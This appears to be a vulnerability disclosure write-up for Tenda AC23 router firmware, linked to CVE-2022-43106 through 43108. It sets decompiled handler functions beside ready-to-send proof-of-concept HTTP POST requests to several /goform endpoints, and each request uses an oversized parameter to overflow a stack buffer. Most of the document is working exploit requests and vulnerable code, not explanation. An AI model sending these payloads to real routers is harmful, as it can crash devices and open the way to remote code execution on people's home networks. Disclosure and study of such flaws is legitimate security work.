  int v18; // \[sp+70h\] \[+70h\] BYREF
  int v19; // \[sp+74h\] \[+74h\] BYREF
  char v20\[256\]; // \[sp+78h\] \[+78h\] BYREF
  char v21\[256\]; // \[sp+178h\] \[+178h\] BYREF

  v11 = 1;
  v10 = 1;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v13 = 1;
  v14 = 1;
  v15 = 1;
  v16 = 1;
  v17 = 1;
  v18 = 1;
  v19 = 1;
  i = 0;
  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  v9 = (char \*)websGetVar(a1, "schedWifiEnable", "1");
  v8 = (const char \*)websGetVar(a1, "schedStartTime", &unk\_4D7C58);
  v7 = (const char \*)websGetVar(a1, "schedEndTime", &unk\_4D7C58);
  nptr = (char \*)websGetVar(a1, "timeType", "0");
  s = (char \*)websGetVar(a1, "day", "1,1,1,1,1,1,1");
  v1 = wifi\_get\_mibname("wlan", "enable", v20);
  GetValue(v1, v12);
  if ( !LOBYTE(v12\[0\]) )
    strcpy((char \*)v12, "1");
  if ( atoi(nptr) )
    sscanf(s, "%d,%d,%d,%d,%d,%d,%d", &v13, &v14, &v15, &v16, &v17, &v18, &v19);
  SetValue("sys.sched.wifi.timeType", nptr);
  ptr = malloc(0x19u);
  v10 = atoi(v9);
  if ( ptr )
  {
    \*(\_BYTE \*)ptr = atoi((const char \*)v12) != 0;
    \*((\_BYTE \*)ptr + 1) = atoi(v9) != 0;
    strcpy((char \*)ptr + 2, v8);
    strcpy((char \*)ptr + 10, v7);
    for ( i = 0; i < 7; ++i )
      \*((\_BYTE \*)ptr + i + 18) = \*(&v13 + i) != 0;
    sub\_461D5C(ptr, 0);
    free(ptr);
    v11 = 0;
  }
  CommitCfm();
  if ( v10 )
  {
    sprintf(v21, "op=%d", 1);
    send\_msg\_to\_netctrl(62, v21);
    v11 = 0;
  }
  websWrite(
    a1,
    "HTTP/1.1 200 OK\\nContent-type: text/plain; charset=utf-8\\nPragma: no-cache\\nCache-Control: no-cache\\n\\n");
  websWrite(a1, "{\\"errCode\\":%d}", v11);
  return websDone(a1, 200);
}

**poc**

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.0.1
Content-Length: 102
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aoccvb
Connection: close

schedWifiEnable=1&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&schedEndTime=07%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

**fromSetWirelessRepeat→sub\_45CD64→sub\_45CAD8→sub\_45BB10**

if ( strcmp(v14, "none") )
  {
    if ( strcmp(v14, "wpapsk") )
      return -1;
    v13 = (char \*)websGetVar(a1, "wpapsk\_type", "wpa&wpa2");
    v12 = (char \*)websGetVar(a1, "wpapsk\_crypto", "aes");
    s = (char \*)websGetVar(a1, "wpapsk\_key", &unk\_4D72FC);
    if ( !\*s && strlen(s) < 8 )
      return -1;
    if ( !strcmp(v13, "wpa") )
    {
      strcpy(v20, "psk");
    }
    else if ( !strcmp(v13, "wpa2") )
    {
      strcpy(v20, "psk2");
    }
    else
    {
      strcpy(v20, "psk+psk2");
    }
    if ( !strcmp(v12, "tkip&aes") )
      strcpy(v21, "tkip+aes");
    else
      strcpy(v21, v12);
    v6 = wifi\_get\_mibname(a3, "extend\_wpapsk\_type", v18);
    SetValue(v6, v20);
    v7 = wifi\_get\_mibname(a3, "extend\_wpapsk\_crypto", v18);
    SetValue(v7, v21);
    v8 = wifi\_get\_mibname(a3, "extend\_wpapsk\_key", v18);
    SetValue(v8, s);
  }

**poc**

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 247
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251fsacvb
Connection: close

wifi\_chkHz=1&wl\_mode=wisp&wl\_enbale=1&country\_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk\_key=11111111&security=wpapsk&wpapsk\_type=wpa&wpapsk\_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

**fromSetWifiGusetBasic**

\_\_src = (char \*)websGetVar(param\_1,"shareSpeed",&DAT\_004d83a0);
  strcpy((char \*)&local\_124,\_\_src);

**poc**

POST /goform/WifiGuestSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 531
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251tyacvb
Connection: close

guestEn=1&guestEn\_5g=1&guestSecurity=wpapsk&guestSecurity\_5g=wpapsk&guestSsid=Tenda\_VIP&guestSsid\_5g=Tenda\_VIP\_5G&guestWrlPwd=11111111&guestWrlPwd\_5g=11111111&effectiveTime=8&shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**formSetQosBand**

formSetQosBand→set\_qosMib\_list→strcpy(v8, s);

int \_\_fastcall formSetQosBand(int a1)
{
int v2; // \[sp+30h\] \[+30h\]
int v3\[8\]; // \[sp+34h\] \[+34h\] BYREF
char v4\[256\]; // \[sp+54h\] \[+54h\] BYREF
int v5\[8\]; // \[sp+154h\] \[+154h\] BYREF
int v6\[8\]; // \[sp+174h\] \[+174h\] BYREF
int v7\[5\]; // \[sp+194h\] \[+194h\] BYREF

v3\[0\] = 0;
v3\[1\] = 0;
v3\[2\] = 0;
v3\[3\] = 0;
v3\[4\] = 0;
v3\[5\] = 0;
v3\[6\] = 0;
v3\[7\] = 0;
memset(v4, 0, sizeof(v4));
v2 = websGetVar(a1, "list", &unk\_4DEB84);
unSetQosOldMiblist();
set\_qosoldMib\_list();
unSetQosMiblist();
set\_qosMib\_list(v2, 10);

int \_\_fastcall set\_qosMib\_list(const char \*a1, char a2)
{
  char \*v2; // $v0
  char \*s; // \[sp+24h\] \[+24h\]
  const char \*v5; // \[sp+28h\] \[+28h\]
  int v6; // \[sp+2Ch\] \[+2Ch\]
  int v7; // \[sp+30h\] \[+30h\] BYREF
  char v8\[256\]; // \[sp+34h\] \[+34h\] BYREF
  int v9; // \[sp+134h\] \[+134h\] BYREF
  int v10; // \[sp+138h\] \[+138h\]
  int v11\[8\]; // \[sp+13Ch\] \[+13Ch\] BYREF
  int v12\[4\]; // \[sp+15Ch\] \[+15Ch\] BYREF
  int v13\[4\]; // \[sp+16Ch\] \[+16Ch\] BYREF
  char v14\[256\]; // \[sp+17Ch\] \[+17Ch\] BYREF
  int v15; // \[sp+27Ch\] \[+27Ch\]
  int v16; // \[sp+280h\] \[+280h\]
  int v17; // \[sp+284h\] \[+284h\]
  int v18; // \[sp+288h\] \[+288h\]

  v7 = 0;
  memset(v8, 0, sizeof(v8));
  v9 = 0;
  v10 = 0;
  v11\[0\] = 0;
  v11\[1\] = 0;
  v11\[2\] = 0;
  v11\[3\] = 0;
  v11\[4\] = 0;
  v11\[5\] = 0;
  v11\[6\] = 0;
  v11\[7\] = 0;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v12\[2\] = 0;
  v12\[3\] = 0;
  v13\[0\] = 0;
  v13\[1\] = 0;
  v13\[2\] = 0;
  v13\[3\] = 0;
  memset(v14, 0, sizeof(v14));
  s = (char \*)a1;
  v2 = strchr(a1, a2);
  while ( v2 )
  {
    v6 = 0;
    \*v2 = 0;
    v5 = v2 + 1;
    memset(v8, 0, sizeof(v8));
    strcpy(v8, s);
    if ( v8\[0\] == 59 )
    {
      sscanf(v8, ";%\[^;\];%\[^;\];%\[^;\];%\[^;\];", &v9, v11, v13, v12);
    }
    else
    {
      sscanf(v8, "%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s", v14, v11, v13, v12);
      v6 = 1;
    }
    if ( atoi((const char \*)v13) || atoi((const char \*)v12) )
    {
      if ( v6 == 1 )
        set\_device\_name(v14, v11);

这个参数长度不加以限制还会影响set\_device\_name

**poc**

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.0.1
Content-Length: 791
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/net\_control.html?random=0.0444079600832199&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aticvb
Connection: close

list=DESKTOP-V29RD1268aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:77:24:54:a9:c000
Unknownaaaaaaaaaaaaaaaaaaaaaaaaaaaaunknown00

**setSmartPowerManagement**

    nptr = (char \*)websGetVar(a1, "powerSavingEn", "0");
  s = (char \*)websGetVar(a1, "time", "00:00-7:30");
  v4 = websGetVar(a1, "powerSaveDelay", "1");
  v3 = (char \*)websGetVar(a1, "ledCloseType", "allClose");
  if ( nptr && s && v4 && v3 )
  {
    sscanf(s, "%\[^:\]:%\[^-\]-%\[^:\]:%s", v7, v8, v9, v10);
    sprintf(v11, "%s:%s", (const char \*)v7, (const char \*)v8);
    sprintf(v12, "%s:%s", (const char \*)v9, (const char \*)v10);
    GetValue("sys.sched.led.closetype", v13);

**poc**

POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 803
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/sleep\_mode.html?random=0.7222154127483253&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251csvcvb
Connection: close

powerSavingEn=1&time=0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0%3A00-07%3A00&ledCloseType=allClose&powerSaveDelay=1

**formSetFirewallCfg**

int \_\_fastcall formSetFirewallCfg(int a1)
{
  int v1; // $a1
  int v2; // $a2
  \_BOOL4 v4; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v6\[2\]; // \[sp+28h\] \[+28h\] BYREF
  char v7\[64\]; // \[sp+30h\] \[+30h\] BYREF
  int v8\[2\]; // \[sp+70h\] \[+70h\] BYREF
  char v9\[64\]; // \[sp+78h\] \[+78h\] BYREF

  v6\[0\] = 0;
  v6\[1\] = 0;
  memset(v7, 0, sizeof(v7));
  v8\[0\] = 0;
  v8\[1\] = 0;
  memset(v9, 0, sizeof(v9));
  s = (char \*)websGetVar(a1, "firewallEn", "1111");
  if ( strlen(s) \>\= 4 )
  {
    strcpy((char \*)v6, s);

**poc**

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 764
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/firewall.html?random=0.3855955678045606&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251izccvb
Connection: close

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-43108: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the time parameter in the setSmartPowerManagement function.

CVE-2022-43107: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the schedStartTime parameter in the setSchedWifi function.

CVE-2022-43106: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the shareSpeed parameter in the fromSetWifiGusetBasic function.

Tag

#apple